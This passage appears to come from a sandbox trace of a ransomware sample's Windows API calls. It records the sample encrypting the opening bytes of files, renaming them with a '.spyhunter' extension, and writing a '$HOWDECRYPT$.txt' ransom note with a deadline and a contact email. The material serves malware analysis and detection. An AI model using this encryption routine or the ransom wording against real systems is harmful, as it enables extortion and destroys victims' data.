hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.169] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce314*=0x2800, lpOverlapped=0x0) returned 1 [0178.169] GetProcessHeap () returned 0x2c0000 [0178.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.169] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.169] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce354*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x25ce354*, lpNumberOfBytesWritten=0x25ce314*=0x4, lpOverlapped=0x0) returned 1 [0178.202] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce314*=0x30, lpOverlapped=0x0) returned 1 [0178.202] CloseHandle (hObject=0xa0) returned 1 [0178.202] GetProcessHeap () returned 0x2c0000 [0178.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0178.203] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll.spyhunter") returned 102 [0178.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll.spyhunter")) returned 1 [0178.203] GetProcessHeap () returned 0x2c0000 [0178.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0178.204] GetProcessHeap () returned 0x2c0000 [0178.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.204] GetProcessHeap () returned 0x2c0000 [0178.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e3f8 | out: hHeap=0x2c0000) returned 1 [0178.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce358 | out: pbBuffer=0x25ce358) returned 1 [0178.204] GetProcessHeap () returned 0x2c0000 [0178.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce350*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce350*=0x30) returned 1 [0178.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.205] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 72 [0178.205] StrStrW (lpFirst="msdia100.dll", lpSrch=".txt") returned 0x0 [0178.205] GetProcessHeap () returned 0x2c0000 [0178.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.205] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce314*=0x2800, lpOverlapped=0x0) returned 1 [0178.215] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.215] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce314*=0x2800, lpOverlapped=0x0) returned 1 [0178.215] GetProcessHeap () returned 0x2c0000 [0178.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.215] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.215] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce354*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x25ce354*, lpNumberOfBytesWritten=0x25ce314*=0x4, lpOverlapped=0x0) returned 1 [0178.216] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce314, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce314*=0x30, lpOverlapped=0x0) returned 1 [0178.216] CloseHandle (hObject=0xa0) returned 1 [0178.216] GetProcessHeap () returned 0x2c0000 [0178.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.216] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.spyhunter") returned 82 [0178.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia100.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia100.dll.spyhunter")) returned 1 [0178.217] GetProcessHeap () returned 0x2c0000 [0178.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.217] GetProcessHeap () returned 0x2c0000 [0178.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.217] GetProcessHeap () returned 0x2c0000 [0178.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66960 | out: hHeap=0x2c0000) returned 1 [0178.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.218] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.218] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce287*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3b0, lpOverlapped=0x0 | out: lpBuffer=0x25ce287*, lpNumberOfBytesWritten=0x25ce3b0*=0x127, lpOverlapped=0x0) returned 1 [0178.220] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.220] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3b0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3b0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.220] CloseHandle (hObject=0xa0) returned 1 [0178.220] GetProcessHeap () returned 0x2c0000 [0178.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9c48 | out: hHeap=0x2c0000) returned 1 [0178.220] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.224] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.224] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce283*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce283*, lpNumberOfBytesWritten=0x25ce3ac*=0x127, lpOverlapped=0x0) returned 1 [0178.225] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.225] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3ac*=0x2ac, lpOverlapped=0x0) returned 1 [0178.225] CloseHandle (hObject=0x9c) returned 1 [0178.225] GetProcessHeap () returned 0x2c0000 [0178.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a96a0 | out: hHeap=0x2c0000) returned 1 [0178.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.226] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.226] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce27f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x25ce27f*, lpNumberOfBytesWritten=0x25ce3a8*=0x127, lpOverlapped=0x0) returned 1 [0178.227] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.227] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3a8*=0x2ac, lpOverlapped=0x0) returned 1 [0178.227] CloseHandle (hObject=0x9c) returned 1 [0178.227] GetProcessHeap () returned 0x2c0000 [0178.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a95b0 | out: hHeap=0x2c0000) returned 1 [0178.227] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\triedit\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.229] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.229] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce27b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce27b*, lpNumberOfBytesWritten=0x25ce3a4*=0x127, lpOverlapped=0x0) returned 1 [0178.229] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.229] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3a4*=0x2ac, lpOverlapped=0x0) returned 1 [0178.230] CloseHandle (hObject=0x9c) returned 1 [0178.230] GetProcessHeap () returned 0x2c0000 [0178.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c350 | out: hHeap=0x2c0000) returned 1 [0178.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.231] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.231] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce277*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce3a0, lpOverlapped=0x0 | out: lpBuffer=0x25ce277*, lpNumberOfBytesWritten=0x25ce3a0*=0x127, lpOverlapped=0x0) returned 1 [0178.232] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.232] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce3a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce3a0*=0x2ac, lpOverlapped=0x0) returned 1 [0178.232] CloseHandle (hObject=0x9c) returned 1 [0178.232] GetProcessHeap () returned 0x2c0000 [0178.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a94c0 | out: hHeap=0x2c0000) returned 1 [0178.232] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.233] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.233] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce273*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x25ce273*, lpNumberOfBytesWritten=0x25ce39c*=0x127, lpOverlapped=0x0) returned 1 [0178.234] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.234] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce39c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.234] CloseHandle (hObject=0x9c) returned 1 [0178.234] GetProcessHeap () returned 0x2c0000 [0178.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d7c0 | out: hHeap=0x2c0000) returned 1 [0178.234] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce338 | out: pbBuffer=0x25ce338) returned 1 [0178.234] GetProcessHeap () returned 0x2c0000 [0178.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.234] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce330*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce330*=0x30) returned 1 [0178.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.235] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe") returned 84 [0178.235] StrStrW (lpFirst="Wkconv.exe", lpSrch=".txt") returned 0x0 [0178.235] GetProcessHeap () returned 0x2c0000 [0178.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.236] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce2f4*=0x2800, lpOverlapped=0x0) returned 1 [0178.308] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.308] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce2f4*=0x2800, lpOverlapped=0x0) returned 1 [0178.309] GetProcessHeap () returned 0x2c0000 [0178.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.309] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.309] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce334*, lpNumberOfBytesWritten=0x25ce2f4*=0x4, lpOverlapped=0x0) returned 1 [0178.468] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2f4*=0x30, lpOverlapped=0x0) returned 1 [0178.468] CloseHandle (hObject=0x9c) returned 1 [0178.468] GetProcessHeap () returned 0x2c0000 [0178.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.468] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe.spyhunter") returned 94 [0178.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\WksConv\\Wkconv.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wksconv\\wkconv.exe.spyhunter")) returned 1 [0178.469] GetProcessHeap () returned 0x2c0000 [0178.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.470] GetProcessHeap () returned 0x2c0000 